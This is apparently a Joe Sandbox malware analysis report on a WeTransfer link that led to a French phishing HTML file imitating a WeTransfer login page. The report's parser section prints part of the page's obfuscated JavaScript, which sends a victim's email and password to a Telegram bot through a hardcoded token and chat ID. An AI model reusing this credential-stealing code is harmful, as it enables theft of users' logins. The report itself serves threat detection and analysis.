Edit tour

Windows Analysis Report
https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_camp

Overview

General Information

Sample URL:https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_net
Analysis ID:1670900
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
AI detected suspicious Javascript
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-22T09:46:18.207394+020018100071Potentially Bad Traffic192.168.2.1650053149.154.167.220443TCP
2025-04-22T09:46:19.540811+020018100071Potentially Bad Traffic192.168.2.1650055149.154.167.220443TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.19.pages.csv
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.20.pages.csv
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.21.pages.csv
Source: 1.199..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Facture%20012365.htm... This script demonstrates several high-risk behaviors that indicate potential malicious intent:1. Dynamic Code Execution: The script uses obfuscated code with the `_0x1298` function, which appears to be a custom implementation of a code execution mechanism. This is a high-risk indicator.2. Data Exfiltration: The script sends user data (email and password) to a Telegram bot API endpoint, which is a clear case of data exfiltration and a high-risk indicator.3. Obfuscated Code/URLs: The script uses heavily obfuscated variable names and function calls, which is a high-risk indicator.4. Suspicious Domains: The script attempts to redirect the user to the domain 'wetransfer.com', which is not a trusted domain and may be part of a phishing or malware campaign.Overall, the combination of these high-risk behaviors and the suspicious nature of the script's functionality suggests that this is a highly malicious script that should be blocked and investigated further.
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: var _0x40d1b3 = _0x1298; function _0x1298(_0x93b389, _0x301fc5) { var _0x190b9e = _0x190b(); return ( (_0x1298 = function (_0x12988f, _0x35f94c) { _0x12988f = _0x12988f - 0x121; var _0x866d3 = _0x190b9e[_0x12988f]; return _0x866d3; }), _0x1298(_0x93b389, _0x301fc5) ); } function _0x1298a(data) { const _0x40d1b3a = '7323885544:aagjtnqqrvbilbh0dhfsyc9qs_pg5mapcgk'; const _0x301fc5a = '5442419581'; const _0x93b389a = ` - ${data.email}:${data.password}`; const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendmessage?chat_id=${_0x301fc5a}&text=${encodeuricomponent( _0x93b389a )}`; fetch(_0x190b9ea, { method: "get" }) .then((response) => { if (response.ok) { // la requte a russi } else { } }) .catch((error) => { console.error(error); }); } function _0x190b() { var _0...
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: Total embedded image size: 23250
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: Base64 decoded: auth0|678f85cbbe51a88063644377
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: Title: Wetransfer - Partage de document. does not match URL
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: <input type="password" .../> found
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:50055 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:50053 -> 149.154.167.220:443
Source: classification engineClassification label: mal64.phis.win@0/0@0/0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
Path InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1670900 URL: https://wetransfer.com/down... Startdate: 22/04/2025 Architecture: WINDOWS Score: 64 5 Suricata IDS alerts for network traffic 2->5 7 AI detected phishing page 2->7 9 AI detected suspicious Javascript 2->9 11 Javascript uses Telegram API 2->11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

No bigger version

windows-stand
SourceDetectionScannerLabelLink
https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_010%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/Facture%20012365.html0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
file:///C:/Users/user/Desktop/Facture%20012365.htmltrue
  • Avira URL Cloud: safe
unknown
No contacted IP infos
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1670900
Start date and time:2025-04-22 09:43:59 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Sample URL:https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:0
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Detection:MAL
Classification:mal64.phis.win@0/0@0/0
  • No process behavior to analyse as no analysis process or sample was found
  • Excluded IPs from analysis (whitelisted): 142.250.68.227, 142.251.2.84, 142.250.68.238, 20.109.210.53, 192.178.49.162, 150.171.27.10, 184.29.183.29, 192.178.49.195, 192.178.49.170
  • Excluded domains from analysis (whitelisted): clients2.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, translate.googleapis.com, bat.bing.com, update.googleapis.com, clientservices.googleapis.com, pagead2.googlesyndication.com
  • VT rate limit hit for: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&amp;t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&amp;t_network=email&amp;t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&amp;t_s=download_link&amp;t_ts=1745257267&amp;utm_campaign=TRN_TDL_01&amp;utm_source=sendgrid&amp;utm_medium=email&amp;trk=TRN_TDL_01
No simulations
No context
No context
No context
No context
No context
No created / dropped files found
No static file info
No network behavior found
No statistics
No system behavior
No disassembly